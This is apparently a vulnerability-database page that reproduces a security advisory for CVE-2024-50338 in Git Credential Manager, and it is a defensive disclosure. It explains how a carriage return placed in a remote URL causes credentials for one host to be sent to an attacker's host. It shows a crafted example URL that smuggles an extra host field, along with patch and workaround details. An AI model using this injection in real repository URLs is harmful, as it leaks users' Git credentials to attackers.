high
7.4
CWE
200 436
Advisory Published
CVE Published
Advisory Published
Updated

CVE-2024-50338: Carriage-return character in remote URL allows malicious repository to leak credentials in Git Credential Manager

First published: Tue Jan 14 2025(Updated: )

### Description The [Git credential protocol](https://git-scm.com/docs/git-credential#IOFMT) is text-based over standard input/output, and consists of a series of lines of key-value pairs in the format `key=value`. Git's documentation restricts the use of the NUL (`\0`) character and newlines to form part of the keys[^1] or values. When Git reads from standard input, it considers both LF and CRLF[^2] as newline characters for the credential protocol by virtue of [calling `strbuf_getline`](https://github.com/git/git/blob/6a11438f43469f3815f2f0fc997bd45792ff04c0/credential.c#L311) that calls to `strbuf_getdelim_strip_crlf`. Git also validates that a newline is not present in the value by checking for the presence of the line-feed character (LF, `\n`), and errors if this is the case. This captures both LF and CRLF-type newlines. Git Credential Manager uses the .NET standard library [`StreamReader`](https://learn.microsoft.com/en-us/dotnet/api/system.io.streamreader?view=net-8.0) class to [read the standard input stream line-by-line](https://github.com/git-ecosystem/git-credential-manager/blob/ae009e11a0fbef804ad9f78816d84a0bc7e052fe/src/shared/Core/StreamExtensions.cs#L138-L141) and parse the `key=value` credential protocol format. The [implementation of the `ReadLineAsync` method](https://github.com/dotnet/runtime/blob/e476b43b5cb42eb44ce23b1c7b793aa361624cf6/src/libraries/System.Private.CoreLib/src/System/IO/StreamReader.cs#L926) considers LF, CRLF, and CR as valid line endings. This is means that .NET considers a single CR as a valid newline character, whereas Git does not. This mismatch of newline treatment between Git and GCM means that an attacker can craft a malicious remote URL such as: ``` https://\rhost=targethost@badhost ``` ..which will be interpreted by Git as: ``` protocol=https host=badhost username=\rhost=targethost ``` This will instead be parsed by GCM as if the following has been passed by Git: ``` protocol=https host=badhost username= host=targethost ``` This results in the `host` field being resolved to the `targethost` value. GCM will then return a credential for `targethost` to Git, which will then send this credential to the `badhost` host. ### Impact When a user clones or otherwise interacts[^3] with a malicious repository that requires authentication, the attacker can capture credentials for another Git remote. The attack is also heightened when cloning from repositories with submodules when using the `--recursive` clone option as the user is not able to inspect the submodule remote URLs beforehand. ### Patches https://github.com/git-ecosystem/git-credential-manager/compare/749e287571c78a2b61f926ccce6a707050871ab8...99e2f7f60e7364fe807e7925f361a81f3c47bd1b ### Workarounds Only interacting with trusted remote repositories, and do not clone with `--recursive` to allow inspection of any submodule URLs before cloning those submodules. ### Fixed versions This issue is fixed as of [version 2.6.1](https://github.com/git-ecosystem/git-credential-manager/releases/tag/v2.6.1). [^1]: The `=` character is also forbidden to form part of the key. [^2]: Carriage-return character (CR, `\r`), followed by a line-feed character. [^3]: Any remote operation such as `fetch`, `ls-remote`, etc.

Credit: security-advisories@github.com security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
Microsoft Visual Studio 2022=17.12
fix available externally
Microsoft Visual Studio 2022=17.6
fix available externally
Microsoft Visual Studio 2019 (includes 16.0 - 16.10)=16.11
fix available externally
Microsoft Visual Studio 2022=17.8
fix available externally
Microsoft Visual Studio 2017 (includes 15.0 - 15.8)=15.9
fix available externally
Microsoft Visual Studio 2022=17.10
fix available externally
nuget/git-credential-manager<=2.6.0
2.6.1

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Read MoreStart Free Trial

Reference Links

Frequently Asked Questions

  • What is the severity of CVE-2024-50338?

    CVE-2024-50338 has a moderate severity level due to its potential for information disclosure.

  • How do I fix CVE-2024-50338?

    To fix CVE-2024-50338, update to the latest version of Visual Studio 2022 or Visual Studio 2019 as specified in the security advisory.

  • Which versions of Visual Studio are affected by CVE-2024-50338?

    CVE-2024-50338 affects Visual Studio 2017 versions 15.9, Visual Studio 2019 version 16.11, and multiple versions of Visual Studio 2022.

  • Is there a specific package that needs to be updated for CVE-2024-50338?

    Yes, the Git Credential Manager package should be updated to version 2.6.1 or newer to mitigate CVE-2024-50338.

  • What type of vulnerability is CVE-2024-50338?

    CVE-2024-50338 is a type of information disclosure vulnerability that affects the Git credential protocol.

Company

Resources

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203